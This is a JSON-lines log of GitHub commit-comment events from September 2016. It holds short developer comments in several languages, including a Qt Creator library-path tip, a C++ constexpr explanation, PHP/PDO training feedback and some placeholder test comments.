{"id":"4615973757","type":"CommitCommentEvent","actor":{"login":"FSund"},"repo":{"name":"hahn-kev/qtcreator-project-structure"},"payload":{"comment":{"id":19168026,"position":null,"line":null,"path":null,"commit_id":"c9622d04d9758aeff0ed8e7ef2d3545f25979b2c","created_at":"2016-09-26T06:27:48Z","updated_at":"2016-09-26T06:27:48Z","body":"This usually happens if you try to run the executable from a regular terminal window. The fix is to update the environment variable LD_LIBRARY_PATH to match the one used by QtCreator. This is visible under by navigating to Projects -> Run -> Run Environment (Details) -> LD_LIBRARY_PATH. Copy the value from here, and use the following command to run the executable in a terminal:\r\n\r\n`LD_LIBRARY_PATH=<value from QtCreator> ./myapp`\r\n\r\nOn my machine it looks like this\r\n\r\n`LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu:/home/filip/code/build-<projectName>-Desktop-Debug/src: ./myapp`"}},"created_at":"2016-09-26T06:27:48Z"}
{"id":"4615974212","type":"CommitCommentEvent","actor":{"login":"osteenbergen"},"repo":{"name":"osteenbergen/slackify"},"payload":{"comment":{"id":19168027,"position":null,"line":null,"path":null,"commit_id":"d2dbf34a4558e204db6c45db8bdec88a4484b18e","created_at":"2016-09-26T06:27:58Z","updated_at":"2016-09-26T06:27:58Z","body":"You can easily add the listen_to to your own project. It is a very quick and ugly hack that just reconnects when slack broadcasts a ```<username> has joined``` message.\r\n\r\nTo add it to the slackbot library itself you would need to patch the dispatcher's ```_on_new_message``` function to listen for these broadcasts and re-read the user list or only fetch the user information."}},"created_at":"2016-09-26T06:27:58Z"}
{"id":"4615974803","type":"CommitCommentEvent","actor":{"login":"maniac23"},"repo":{"name":"maniac23/imaguru"},"payload":{"comment":{"id":19168028,"position":3,"line":3,"path":"src/style/partials/icons-list.scss","commit_id":"1bae332888f72590fb18f31512f284cb15a205ed","created_at":"2016-09-26T06:28:11Z","updated_at":"2016-09-26T06:28:11Z","body":"@SiarheiD font size указывай rem, плиз"}},"created_at":"2016-09-26T06:28:11Z"}
{"id":"4615975230","type":"CommitCommentEvent","actor":{"login":"1995G"},"repo":{"name":"NewOrigin1606/First-Project"},"payload":{"comment":{"id":19168035,"position":2,"line":4,"path":"README.md","commit_id":"fb666b5eabdb1bca7b43663ee640bb03ad2fba4e","created_at":"2016-09-26T06:28:20Z","updated_at":"2016-09-26T06:28:20Z","body":"委屈我去额为企鹅企鹅我去我去额外"}},"created_at":"2016-09-26T06:28:20Z"}
{"id":"4615976797","type":"CommitCommentEvent","actor":{"login":"1995G"},"repo":{"name":"NewOrigin1606/First-Project"},"payload":{"comment":{"id":19168040,"position":3,"line":5,"path":"README.md","commit_id":"fb666b5eabdb1bca7b43663ee640bb03ad2fba4e","created_at":"2016-09-26T06:28:55Z","updated_at":"2016-09-26T06:28:55Z","body":"1234455666774555热问题热问问\r\n"}},"created_at":"2016-09-26T06:28:55Z"}
{"id":"4615976829","type":"CommitCommentEvent","actor":{"login":"coolmridul"},"repo":{"name":"coolmridul/Learn-C-language"},"payload":{"comment":{"id":19168041,"position":1,"line":1,"path":"Print  \"Hello World\"","commit_id":"1785725f507bf875554f0a653930f50531dfb3bf","created_at":"2016-09-26T06:28:55Z","updated_at":"2016-09-26T06:28:55Z","body":"Header file \r\nnecessary to give"}},"created_at":"2016-09-26T06:28:55Z"}
{"id":"4615978083","type":"CommitCommentEvent","actor":{"login":"coolmridul"},"repo":{"name":"coolmridul/Learn-C-language"},"payload":{"comment":{"id":19168049,"position":null,"line":null,"path":null,"commit_id":"1785725f507bf875554f0a653930f50531dfb3bf","created_at":"2016-09-26T06:29:22Z","updated_at":"2016-09-26T06:29:22Z","body":"The C programming language is used for developing system applications that forms a major portion of operating systems such as Windows, UNIX and Linux. Middle level languages don’t provide all the built-in functions found in high level languages, but provides all building blocks that we need to produce the result we want."}},"created_at":"2016-09-26T06:29:22Z"}
{"id":"4615978126","type":"CommitCommentEvent","actor":{"login":"1995G"},"repo":{"name":"NewOrigin1606/First-Project"},"payload":{"comment":{"id":19168051,"position":4,"line":6,"path":"README.md","commit_id":"fb666b5eabdb1bca7b43663ee640bb03ad2fba4e","created_at":"2016-09-26T06:29:23Z","updated_at":"2016-09-26T06:29:23Z","body":"普吉岛\r\n"}},"created_at":"2016-09-26T06:29:23Z"}
{"id":"4615982982","type":"CommitCommentEvent","actor":{"login":"bkoppelmann"},"repo":{"name":"sagark/riscv-qemu-upstream"},"payload":{"comment":{"id":19168062,"position":96,"line":523,"path":"target-riscv/translate.c","commit_id":"d8261b75445c15d95cce3859ffde37fefa3b7ef2","created_at":"2016-09-26T06:31:06Z","updated_at":"2016-09-26T06:31:06Z","body":"Why double this code up here. Move it out of the #ifdef"}},"created_at":"2016-09-26T06:31:06Z"}
{"id":"4615985494","type":"CommitCommentEvent","actor":{"login":"TimHsue"},"repo":{"name":"11HighSchoolofZhengzhou/syzoj"},"payload":{"comment":{"id":19168066,"position":8,"line":8,"path":"syzoj/update_assistant/misc.py","commit_id":"f6f03be59e1847f219bac3535803f98f15900b15","created_at":"2016-09-26T06:31:52Z","updated_at":"2016-09-26T06:31:52Z","body":"不知道是服务器性能原因还是别的什么，初始化的时候已经AC过的题二次提交会判断为WA，不过之后使用完全正常，姑且认为是多线程的锅吧: )"}},"created_at":"2016-09-26T06:31:52Z"}
{"id":"4615990168","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19168070,"position":335,"line":335,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-26T06:33:26Z","updated_at":"2016-09-26T06:33:26Z","body":"that，this反复出现。。"}},"created_at":"2016-09-26T06:33:26Z"}
{"id":"4615991477","type":"CommitCommentEvent","actor":{"login":"safwank"},"repo":{"name":"safwank/toniq"},"payload":{"comment":{"id":19168072,"position":null,"line":null,"path":null,"commit_id":"3f12381ad5766ab9dcc5af3198ac7cf4f37937fe","created_at":"2016-09-26T06:33:56Z","updated_at":"2016-09-26T06:33:56Z","body":"We did consider using a separate redis list by bypassing `toniq` altogether, but ultimately decided to use `toniq` for convenience and consistency. Also, the process of turning OFF the switch is a manual one as we want to be absolutely sure that all is well with the internal jobs before enqueueing the suspended jobs. "}},"created_at":"2016-09-26T06:33:56Z"}
{"id":"4615993884","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19168076,"position":null,"line":null,"path":null,"commit_id":"c53b3a0c1c492984c985ded660d8bad827c7948d","created_at":"2016-09-26T06:34:50Z","updated_at":"2016-09-26T06:34:50Z","body":"If you think the PR is very simple and can skip the review process then just let us know and I'm sure one of us devs will be able to give it a quick thumbs up so it can be merged"}},"created_at":"2016-09-26T06:34:50Z"}
{"id":"4615994943","type":"CommitCommentEvent","actor":{"login":"joryphillips"},"repo":{"name":"samccone/moji-brush"},"payload":{"comment":{"id":19168078,"position":null,"line":null,"path":null,"commit_id":"e95f3ca9e3be7dc748755bada80f4ae6fa6a8a92","created_at":"2016-09-26T06:35:11Z","updated_at":"2016-09-26T06:35:11Z","body":"Should fix #38 "}},"created_at":"2016-09-26T06:35:11Z"}
{"id":"4615996005","type":"CommitCommentEvent","actor":{"login":"barakam1"},"repo":{"name":"barakam1/E-portal"},"payload":{"comment":{"id":19168081,"position":4,"line":4,"path":"README.md","commit_id":"9e950fe3b0e18a1dac3075aa58017b22741d2041","created_at":"2016-09-26T06:35:33Z","updated_at":"2016-09-26T06:35:33Z","body":"printf(\"enter the price\");"}},"created_at":"2016-09-26T06:35:33Z"}
{"id":"4616000922","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19168088,"position":10,"line":27,"path":"issue18/login.sql","commit_id":"a3b651d5bb78a74ff1caff1a96cc046f7cbd8c7d","created_at":"2016-09-26T06:37:19Z","updated_at":"2016-09-26T06:37:19Z","body":"ユニークである必要は、重複する名前が存在する場合にログインできなくなる可能性があるからでしょうか。\r\n\r\n下記からユニーク制約をつける形かと思いますが、#1062 - Duplicate entry ':name' for key 'name'のようなエラーが出てしまいます。こちら再度テーブルを作り直さなければならない形でしょうか。\r\n![image](https://cloud.githubusercontent.com/assets/19584742/18824680/e44acec4-83fe-11e6-96ee-519d8ed55c04.png)\r\n"}},"created_at":"2016-09-26T06:37:19Z"}
{"id":"4616003566","type":"CommitCommentEvent","actor":{"login":"erikerikson"},"repo":{"name":"Nordstrom/serverless"},"payload":{"comment":{"id":19168091,"position":null,"line":null,"path":null,"commit_id":"2f99b332a6bc5c05f0ad0e738bb497e15e4263b7","created_at":"2016-09-26T06:38:12Z","updated_at":"2016-09-26T06:38:12Z","body":"Not at all, just informing :)\r\n\r\nThanks for taking a look!"}},"created_at":"2016-09-26T06:38:12Z"}
{"id":"4616006310","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19168098,"position":16,"line":20,"path":"issue11-2/update-delete.php","commit_id":"98653b5f4240ada32931bc738e2d440f2151dfa5","created_at":"2016-09-26T06:39:12Z","updated_at":"2016-09-26T06:39:12Z","body":"バインドしないというとどのような形を想定されていますでしょうか。"}},"created_at":"2016-09-26T06:39:12Z"}
{"id":"4616011113","type":"CommitCommentEvent","actor":{"login":"DrewNaylor"},"repo":{"name":"DrewNaylor/UXL-Launcher"},"payload":{"comment":{"id":19168111,"position":null,"line":null,"path":null,"commit_id":"6650774220554b5c1906e6a38f3ac985013cf6e2","created_at":"2016-09-26T06:40:50Z","updated_at":"2016-09-26T06:40:50Z","body":"It's not magic either."}},"created_at":"2016-09-26T06:40:50Z"}
{"id":"4616011921","type":"CommitCommentEvent","actor":{"login":"DenSan11"},"repo":{"name":"DenSan11/Unity"},"payload":{"comment":{"id":19168114,"position":null,"line":null,"path":null,"commit_id":"e61d133eb325421c0d87cf849189f32ef5e344ec","created_at":"2016-09-26T06:41:05Z","updated_at":"2016-09-26T06:41:05Z","body":"asdfghz"}},"created_at":"2016-09-26T06:41:05Z"}
{"id":"4616016559","type":"CommitCommentEvent","actor":{"login":"CaseyCarter"},"repo":{"name":"hsutter/gcpp"},"payload":{"comment":{"id":19168119,"position":null,"line":null,"path":null,"commit_id":"2fc4c8d487fc9863951788d2d3938c8a89e06c84","created_at":"2016-09-26T06:42:41Z","updated_at":"2016-09-26T06:42:41Z","body":"Aha! `std::fill` takes its third parameter by `const&`, and `value ? ALL_TRUE : ALL_FALSE` is an lvalue, so `set_all` ODR-uses `ALL_TRUE` and `ALL_FALSE` and they must be defined. If you change that expression to (no joke) `+(value ? ALL_TRUE : ALL_FALSE)` it becomes a prvalue that doesn't ODR-use `ALL_TRUE` or `ALL_FALSE`.\r\n\r\nYes, this is one of the weirdest issues around `constexpr`. "}},"created_at":"2016-09-26T06:42:41Z"}
{"id":"4616016943","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19168120,"position":10,"line":27,"path":"issue18/login.sql","commit_id":"a3b651d5bb78a74ff1caff1a96cc046f7cbd8c7d","created_at":"2016-09-26T06:42:49Z","updated_at":"2016-09-26T06:42:49Z","body":"#1062 - Duplicate entry ':name' for key 'name' \r\n\r\nこちらから想像されるエラーの原因はありますでしょうか。\r\n\r\n「#1062 - Duplicate entry ':name' for key 'name'」このままコピペして調べるのもありです。"}},"created_at":"2016-09-26T06:42:49Z"}
{"id":"4616017139","type":"CommitCommentEvent","actor":{"login":"umitems"},"repo":{"name":"neungnarakjung/BlindPhoneByDroid"},"payload":{"comment":{"id":19168121,"position":null,"line":null,"path":null,"commit_id":"6095f26beabf751ad092c88c956001fa1f77e79b","created_at":"2016-09-26T06:42:53Z","updated_at":"2016-09-26T06:42:53Z","body":"I think we should \r\n\r\n1. Separate Android and web to another branch or repo.\r\n\r\n2. Remove Thai word"}},"created_at":"2016-09-26T06:42:53Z"}
{"id":"4616017679","type":"CommitCommentEvent","actor":{"login":"TimHsue"},"repo":{"name":"11HighSchoolofZhengzhou/syzoj"},"payload":{"comment":{"id":19168123,"position":8,"line":8,"path":"syzoj/update_assistant/misc.py","commit_id":"f6f03be59e1847f219bac3535803f98f15900b15","created_at":"2016-09-26T06:43:04Z","updated_at":"2016-09-26T06:43:04Z","body":"already solved..."}},"created_at":"2016-09-26T06:43:04Z"}
{"id":"4616021460","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"cooler-SAI/JadeCore"},"payload":{"comment":{"id":19168129,"position":null,"line":null,"path":null,"commit_id":"0c3605686915892fbd75025e2799f0c5afb672fe","created_at":"2016-09-26T06:44:23Z","updated_at":"2016-09-26T06:44:23Z","body":"Very good!"}},"created_at":"2016-09-26T06:44:23Z"}
{"id":"4616028072","type":"CommitCommentEvent","actor":{"login":"drakerehfeld"},"repo":{"name":"LavaLabUSC/usclavalab.org"},"payload":{"comment":{"id":19168142,"position":null,"line":null,"path":null,"commit_id":"c84d71b715aa2c1dc56a8a1ccbf1196a76115cb0","created_at":"2016-09-26T06:46:39Z","updated_at":"2016-09-26T06:46:39Z","body":"love me some new logos\r\n"}},"created_at":"2016-09-26T06:46:39Z"}
{"id":"4616028409","type":"CommitCommentEvent","actor":{"login":"joshdias"},"repo":{"name":"joshdias/joshdias.com"},"payload":{"comment":{"id":19168144,"position":null,"line":null,"path":null,"commit_id":"728c0bdee4e8d5104ec190f09b221d9bd1fec7e7","created_at":"2016-09-26T06:46:45Z","updated_at":"2016-09-26T06:46:45Z","body":"Google Verification"}},"created_at":"2016-09-26T06:46:45Z"}
{"id":"4616032470","type":"CommitCommentEvent","actor":{"login":"winpisces"},"repo":{"name":"winpisces/CloudTerraForm"},"payload":{"comment":{"id":19168150,"position":null,"line":null,"path":null,"commit_id":"fc307dee61c7acfe3e26d012b4cd8387de6d2fc3","created_at":"2016-09-26T06:48:06Z","updated_at":"2016-09-26T06:48:06Z","body":"[Dell.zip](https://github.com/winpisces/CloudTerraForm/files/492387/Dell.zip)\r\n"}},"created_at":"2016-09-26T06:48:06Z"}
{"id":"4616033336","type":"CommitCommentEvent","actor":{"login":"winpisces"},"repo":{"name":"winpisces/CloudTerraForm"},"payload":{"comment":{"id":19168153,"position":null,"line":null,"path":null,"commit_id":"fc307dee61c7acfe3e26d012b4cd8387de6d2fc3","created_at":"2016-09-26T06:48:22Z","updated_at":"2016-09-26T06:48:22Z","body":"done.  \r\n"}},"created_at":"2016-09-26T06:48:22Z"}
{"id":"4616034418","type":"CommitCommentEvent","actor":{"login":"dtaht"},"repo":{"name":"kdarbyshirebryant/sch_cake"},"payload":{"comment":{"id":19168155,"position":null,"line":null,"path":null,"commit_id":"fd68acda8c4ca9a9d73ae15d1b01727456613489","created_at":"2016-09-26T06:48:45Z","updated_at":"2016-09-26T06:48:45Z","body":"I got src and dst wrong 7 times today elsewhere."}},"created_at":"2016-09-26T06:48:45Z"}
{"id":"4616039092","type":"CommitCommentEvent","actor":{"login":"thawi-sost"},"repo":{"name":"digibib/ls.ext"},"payload":{"comment":{"id":19168166,"position":null,"line":null,"path":null,"commit_id":"4260961cafad760786792ef10d88209e3d4edf21","created_at":"2016-09-26T06:50:16Z","updated_at":"2016-09-26T06:50:16Z","body":"Mid refactor of profile pages"}},"created_at":"2016-09-26T06:50:16Z"}
{"id":"4616039552","type":"CommitCommentEvent","actor":{"login":"gaochunmei"},"repo":{"name":"gaochunmei/MyFristGit"},"payload":{"comment":{"id":19168168,"position":3,"line":2,"path":"Frist","commit_id":"cee44225311c25730f0d9946f4542c68da76700d","created_at":"2016-09-26T06:50:24Z","updated_at":"2016-09-26T06:50:24Z","body":"dsf"}},"created_at":"2016-09-26T06:50:24Z"}
{"id":"4616040623","type":"CommitCommentEvent","actor":{"login":"gaochunmei"},"repo":{"name":"gaochunmei/MyFristGit"},"payload":{"comment":{"id":19168170,"position":null,"line":null,"path":null,"commit_id":"cee44225311c25730f0d9946f4542c68da76700d","created_at":"2016-09-26T06:50:44Z","updated_at":"2016-09-26T06:50:44Z","body":"aaaaaaaaaa"}},"created_at":"2016-09-26T06:50:44Z"}
{"id":"4616041735","type":"CommitCommentEvent","actor":{"login":"gaochunmei"},"repo":{"name":"gaochunmei/MyFristGit"},"payload":{"comment":{"id":19168171,"position":2,"line":2,"path":"Frist","commit_id":"cee44225311c25730f0d9946f4542c68da76700d","created_at":"2016-09-26T06:51:09Z","updated_at":"2016-09-26T06:51:09Z","body":"ds"}},"created_at":"2016-09-26T06:51:09Z"}
{"id":"4616042519","type":"CommitCommentEvent","actor":{"login":"gaochunmei"},"repo":{"name":"gaochunmei/MyFristGit"},"payload":{"comment":{"id":19168172,"position":1,"line":1,"path":"Frist","commit_id":"cee44225311c25730f0d9946f4542c68da76700d","created_at":"2016-09-26T06:51:25Z","updated_at":"2016-09-26T06:51:25Z","body":"dddd"}},"created_at":"2016-09-26T06:51:25Z"}
{"id":"4616045214","type":"CommitCommentEvent","actor":{"login":"JustWangYu"},"repo":{"name":"JustWangYu/First"},"payload":{"comment":{"id":19168175,"position":null,"line":null,"path":null,"commit_id":"66a2647f44895c709a61b1c2cfaed18e2754c9c7","created_at":"2016-09-26T06:52:18Z","updated_at":"2016-09-26T06:52:18Z","body":"Add from Github web page "}},"created_at":"2016-09-26T06:52:18Z"}
{"id":"4616048528","type":"CommitCommentEvent","actor":{"login":"timdiggins"},"repo":{"name":"thredded/thredded"},"payload":{"comment":{"id":19168181,"position":13,"line":119,"path":"app/controllers/thredded/topics_controller.rb","commit_id":"a0fdbcc30e82417939dcd33947e7f7dae88e701e","created_at":"2016-09-26T06:53:24Z","updated_at":"2016-09-26T06:53:24Z","body":"@glebm this should remain as destroy rather than change to destroy! -- it's quite reasonable to try to unfollow something that has already been unfollowed -- should be silent rather than raise an error. \r\n\r\nMaybe for parallelism (and trivial testing) it should be a method: `UserTopicFollow.destroy_if_exists` (though it still wouldn't make sense with a !)"}},"created_at":"2016-09-26T06:53:24Z"}
{"id":"4616050404","type":"CommitCommentEvent","actor":{"login":"drakerehfeld"},"repo":{"name":"LavaLabUSC/usclavalab.org"},"payload":{"comment":{"id":19168185,"position":null,"line":null,"path":null,"commit_id":"c84d71b715aa2c1dc56a8a1ccbf1196a76115cb0","created_at":"2016-09-26T06:53:58Z","updated_at":"2016-09-26T06:53:58Z","body":"we are gunna need to either upload nice square versions or do some css trickery to make them look nice on a grid tho"}},"created_at":"2016-09-26T06:53:58Z"}
{"id":"4616053261","type":"CommitCommentEvent","actor":{"login":"Nikhil-z"},"repo":{"name":"jaydeepw/poly-picker"},"payload":{"comment":{"id":19168191,"position":null,"line":null,"path":null,"commit_id":"b728311d398dc26151c663aa1e0f88ed08c647d9","created_at":"2016-09-26T06:54:51Z","updated_at":"2016-09-26T06:54:51Z","body":"@jaydeepw  I too understand this is not an elegant fix . But for me the lib was unavoidable in my project at any cost . I thought it ill be helpful for some if i could share what i did . Thanks . Hope you will find a elegant fix soon :) "}},"created_at":"2016-09-26T06:54:51Z"}
{"id":"4616054282","type":"CommitCommentEvent","actor":{"login":"timdiggins"},"repo":{"name":"thredded/thredded"},"payload":{"comment":{"id":19168192,"position":null,"line":null,"path":null,"commit_id":"a0fdbcc30e82417939dcd33947e7f7dae88e701e","created_at":"2016-09-26T06:55:09Z","updated_at":"2016-09-26T06:55:09Z","body":"@glebm can see why this refactoring makes very good sense, and also see how `UserExtender#follow?` might cause a shadow on a User model (didn't fully understand that UserExtender monkeypatches User everywhere when I wrote this). However it does give downstream implications to my stuff -- would be good to get a heads up on breaking changes like this *before* they go into master."}},"created_at":"2016-09-26T06:55:09Z"}
{"id":"4616055178","type":"CommitCommentEvent","actor":{"login":"mwangxx0129"},"repo":{"name":"mwangxx0129/GeoQuiz"},"payload":{"comment":{"id":19168196,"position":null,"line":null,"path":null,"commit_id":"fc806277ee39d299f379acb0013871f0de4f0c0d","created_at":"2016-09-26T06:55:25Z","updated_at":"2016-09-26T06:55:25Z","body":"Test on the Virtual Device.\r\nBugs on real device; it is needed to figure it out."}},"created_at":"2016-09-26T06:55:25Z"}
{"id":"4616055311","type":"CommitCommentEvent","actor":{"login":"timdiggins"},"repo":{"name":"thredded/thredded"},"payload":{"comment":{"id":19168197,"position":null,"line":null,"path":null,"commit_id":"a0fdbcc30e82417939dcd33947e7f7dae88e701e","created_at":"2016-09-26T06:55:27Z","updated_at":"2016-09-26T06:55:27Z","body":"(but thanks for the cc by the way!)"}},"created_at":"2016-09-26T06:55:27Z"}
{"id":"4616057914","type":"CommitCommentEvent","actor":{"login":"mwangxx0129"},"repo":{"name":"mwangxx0129/GeoQuiz"},"payload":{"comment":{"id":19168203,"position":null,"line":null,"path":null,"commit_id":"fc806277ee39d299f379acb0013871f0de4f0c0d","created_at":"2016-09-26T06:56:17Z","updated_at":"2016-09-26T06:56:17Z","body":"May be android's version."}},"created_at":"2016-09-26T06:56:17Z"}
{"id":"4616065610","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19168213,"position":5,"line":5,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-26T06:58:38Z","updated_at":"2016-09-26T06:58:38Z","body":"なるほどです、了解いたしました。\r\n\r\n####追記 \r\n\r\nこちらの回答で今回のトレーニングの回答として最後になるかと思います。"}},"created_at":"2016-09-26T06:58:38Z"}
{"id":"4616073268","type":"CommitCommentEvent","actor":{"login":"JorisVanEijden"},"repo":{"name":"geerlingguy/ansible-role-mysql"},"payload":{"comment":{"id":19168222,"position":null,"line":null,"path":null,"commit_id":"813fa1399046e54ebc58285f217f847a41d18536","created_at":"2016-09-26T07:00:55Z","updated_at":"2016-09-26T07:00:55Z","body":"You could have merged PR #135 which already had this and fixes the same for other variables."}},"created_at":"2016-09-26T07:00:55Z"}
{"id":"4616073770","type":"CommitCommentEvent","actor":{"login":"bmcage"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":19168224,"position":null,"line":null,"path":null,"commit_id":"a9f137752938aa067a570f104dbbd8e8a360943b","created_at":"2016-09-26T07:01:05Z","updated_at":"2016-09-26T07:01:05Z","body":"although you added a comment, still tricky that somebody who does pylint fixes, changes it again. Or just finds it ugly this way. \r\nPerhaps the best solution was to change it to\r\n`def get_metadata(self, key, default)`\r\nand force passing a good default, as we store all kinds of stuff."}},"created_at":"2016-09-26T07:01:05Z"}
{"id":"4616074234","type":"CommitCommentEvent","actor":{"login":"rgaticav94"},"repo":{"name":"rgaticav94/KuroServer"},"payload":{"comment":{"id":19168226,"position":null,"line":null,"path":null,"commit_id":"ddb3dda09f6750b4eda3cc31f4b194f33027073a","created_at":"2016-09-26T07:01:14Z","updated_at":"2016-09-26T07:01:14Z","body":"Licencia MIT añadida!"}},"created_at":"2016-09-26T07:01:14Z"}
{"id":"4616086561","type":"CommitCommentEvent","actor":{"login":"LukasReschke"},"repo":{"name":"nextcloud/nextcloud.com"},"payload":{"comment":{"id":19168261,"position":2,"line":1,"path":"page-homepage.php","commit_id":"8cc18ac5944539315f00575bf74a598ed6b23aab","created_at":"2016-09-26T07:05:00Z","updated_at":"2016-09-26T07:05:00Z","body":"Thou shall not have done that 🙈 "}},"created_at":"2016-09-26T07:05:00Z"}
{"id":"4616088852","type":"CommitCommentEvent","actor":{"login":"omarreyes-29"},"repo":{"name":"omarreyes-29/PruebaGitHub"},"payload":{"comment":{"id":19168268,"position":null,"line":null,"path":null,"commit_id":"eaaec1ab35a13ecf2ace289206b2cd82c01949b6","created_at":"2016-09-26T07:05:41Z","updated_at":"2016-09-26T07:05:41Z","body":"TEXTO DE PRUEBA"}},"created_at":"2016-09-26T07:05:41Z"}
{"id":"4616091967","type":"CommitCommentEvent","actor":{"login":"sebastianbinder"},"repo":{"name":"BedwarsRel/BedwarsRel"},"payload":{"comment":{"id":19168274,"position":null,"line":null,"path":null,"commit_id":"eb2365d5334a8e4984fa8e752896d17910c8100c","created_at":"2016-09-26T07:06:37Z","updated_at":"2016-09-26T07:06:37Z","body":"Joa wegen mir kann das schon rein…"}},"created_at":"2016-09-26T07:06:37Z"}
{"id":"4616093968","type":"CommitCommentEvent","actor":{"login":"zengfenfei"},"repo":{"name":"ringcentral/ringcentral-js"},"payload":{"comment":{"id":19168280,"position":121,"line":121,"path":"src/core/Utils.js","commit_id":"6fb932581eda2d0296a9dee966a298fda28655ff","created_at":"2016-09-26T07:07:15Z","updated_at":"2016-09-26T07:07:15Z","body":"Even in browser this function will return `true` when used in webpack. Webpack will provide a polyfill `process` object with `browser` property set to `true`."}},"created_at":"2016-09-26T07:07:15Z"}
{"id":"4616102803","type":"CommitCommentEvent","actor":{"login":"cgendreau"},"repo":{"name":"gbif/registry"},"payload":{"comment":{"id":19168317,"position":73,"line":399,"path":"registry-doi/src/main/java/org/gbif/registry/doi/DataCiteConverter.java","commit_id":"f10f6bc304c81ebdf78f5ec63a919b7ba7049f8d","created_at":"2016-09-26T07:09:56Z","updated_at":"2016-09-26T07:09:56Z","body":"why IS_DERIVED_FROM instead of REFERENCES?"}},"created_at":"2016-09-26T07:09:56Z"}
{"id":"4616103673","type":"CommitCommentEvent","actor":{"login":"mamehaze"},"repo":{"name":"mamedev/build"},"payload":{"comment":{"id":19168321,"position":null,"line":null,"path":null,"commit_id":"a820c5c1d7372e3bd0de72b8502143ad5a5930ff","created_at":"2016-09-26T07:10:13Z","updated_at":"2016-09-26T07:10:13Z","body":"there's no reason to have me credited on the SMS stuff, all I did was add it to the XML, hardly worth being credited for.\r\n"}},"created_at":"2016-09-26T07:10:13Z"}
{"id":"4616109276","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19168340,"position":5,"line":5,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-26T07:11:53Z","updated_at":"2016-09-26T07:11:53Z","body":"### 以下全体はイメージになります。イメージしやすいように言葉を簡単に変えていたり、正確にいうと微妙に意味の違うところもあります。ご容赦ください。\r\n\r\nプログラム全体をロボットのようにみたてると、\r\nPDO(に限らず、クラス)は他の人が作ったパーツ(装備品)だと思ってください。\r\n * 本当はクラスは他の人が作ったものを使うこともできますし、自分で作って使うこともできます。\r\n```\r\nnew PDO( 起動するために必要な情報。どんな情報が必要かはパーツ(クラス)を作った人が決めている )\r\n```\r\nの `new` 部分ですが、他の人が作ったパーツを起動するための記述です。\r\n起動するとパーツが備えている様々な技が使えます(ミサイルを搭載しているパーツなら、「ミサイルを発射」できるイメージ)。\r\n技は `->` で呼び出すことができます。\r\n以下の部分が`prepare`という技を使っているところです。\r\n```\r\n$dbh->prepare( 技を使うために必要な情報。これもパーツ(&正確には備わっている技)を作った人が決めている。);\r\n```\r\n- 技のことを `メソッド` といいます。\r\n- ミサイルは `プロパティ` といいます。\r\n\r\nこのようにプログラムは色々なパーツ(他の人が作ったものや、自分が作ったもの)を組み併せて使うものだということを念頭に置いていただければと思います(ロボットの合体のイメージです)。\r\n\r\n上記説明に関して詳しく(&正確に)は「PHP クラス オブジェクト指向」を学ぶと理解できるかと思います。ただ学ぶには時間を要するものですので、まずは上記のイメージを持っていただれば良いかと思っております。"}},"created_at":"2016-09-26T07:11:53Z"}
{"id":"4616113111","type":"CommitCommentEvent","actor":{"login":"didiez"},"repo":{"name":"keycloak/keycloak"},"payload":{"comment":{"id":19168344,"position":4,"line":46,"path":"model/jpa/src/main/java/org/keycloak/models/jpa/entities/UserAttributeEntity.java","commit_id":"5a015a65180746e7082f8abf03d312d3952ad394","created_at":"2016-09-26T07:13:01Z","updated_at":"2016-09-26T07:13:01Z","body":"This line has introduced a new bug (KEYCLOAK-3608) fixed in #3254"}},"created_at":"2016-09-26T07:13:01Z"}
{"id":"4616114029","type":"CommitCommentEvent","actor":{"login":"simonepizza93"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19168345,"position":7,"line":7,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-26T07:13:15Z","updated_at":"2016-09-26T07:13:15Z","body":"Ho solo preso il documento vuoto che uso di solito per iniziare una pagina html, non ci avevo mai fatto caso a quel commento sinceramente, ma comunque i 3 tag sopra se non sbaglio servono per \"inizializzare\" il documento siccome alcuni browser potrebbero usare dei caratteri diversi"}},"created_at":"2016-09-26T07:13:15Z"}
{"id":"4616114078","type":"CommitCommentEvent","actor":{"login":"oDaryl"},"repo":{"name":"oDaryl/test"},"payload":{"comment":{"id":19168346,"position":null,"line":null,"path":null,"commit_id":"d2938587b0375088103c38d4779ecce60fd7db0b","created_at":"2016-09-26T07:13:16Z","updated_at":"2016-09-26T07:13:16Z","body":"echo \"hello world\";"}},"created_at":"2016-09-26T07:13:16Z"}
{"id":"4616114306","type":"CommitCommentEvent","actor":{"login":"jsonjieke"},"repo":{"name":"jsonjieke/UICollection"},"payload":{"comment":{"id":19168347,"position":null,"line":null,"path":null,"commit_id":"b5335a11e0d30cf0b5cce7b095eefc9490fb4749","created_at":"2016-09-26T07:13:20Z","updated_at":"2016-09-26T07:13:20Z","body":"这是一个用collectionView实现的小控件"}},"created_at":"2016-09-26T07:13:20Z"}
